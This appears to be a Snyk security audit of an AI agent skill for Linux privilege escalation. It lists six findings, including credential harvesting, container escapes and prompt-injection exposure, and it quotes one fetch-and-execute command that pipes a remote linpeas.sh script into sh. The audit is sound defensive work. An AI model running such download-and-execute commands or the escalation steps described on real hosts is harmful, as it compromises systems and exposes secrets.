escalating-linux-privileges
Audited by Snyk on Mar 21, 2026
HIGH W007: Insecure credential handling detected in skill instructions.
- Insecure credential handling detected (high risk: 1.00). The skill explicitly instructs enumerating and printing sensitive data (env vars, /etc/shadow, SSH keys, serviceaccount tokens, etc.) and shows commands that embed or expose those secrets, which requires the agent to handle and potentially output secret values verbatim.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 0.80). While many links point to legitimate, widely-used security-research resources (GTFOBins, HackTricks, PEASS, PayloadsAllTheThings), the set includes raw .sh files and precompiled exploit binaries/releases and repositories of kernel/exploit code—direct downloads of scripts/binaries and exploit collections are high-risk and can easily be used to distribute malware if executed without careful verification.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The content is explicitly a post-exploitation privilege-escalation playbook containing step-by-step commands for credential harvesting, remote shells, SUID/cron/sudo abuse, kernel and container escapes, and persistence mechanisms, and therefore constitutes deliberate malicious and backdoor-capable guidance.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The SKILL.md explicitly instructs the agent to fetch and run content from public, user-maintained sites (e.g., curl/wget of GitHub raw URLs for linpeas.sh, LinEnum, lse.sh, pspy and advice to "Google search"/use SearchSploit for kernel exploits), which are untrusted third‑party sources that the agent would ingest and could materially alter behavior.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill explicitly instructs runtime download-and-execute of remote scripts (high-risk example: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh), which fetches and executes external code the skill relies on for enumeration.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly directs the agent to enumerate and exploit sudo/SUID/capabilities, run kernel exploits, modify critical system files (e.g., /etc/passwd, /etc/sudoers, /etc/shadow), create SUID root shells and add root SSH keys, and perform container escapes — all actions that modify and compromise the host system state and obtain persistent privileges.
Issues (6)
Insecure credential handling detected in skill instructions.
Suspicious download URL detected in skill instructions.
Malicious code pattern detected in skill scripts.
Third-party content exposure detected (indirect prompt injection risk).
Unverifiable external dependency detected (runtime URL that controls agent).
Attempt to modify system services in skill instructions.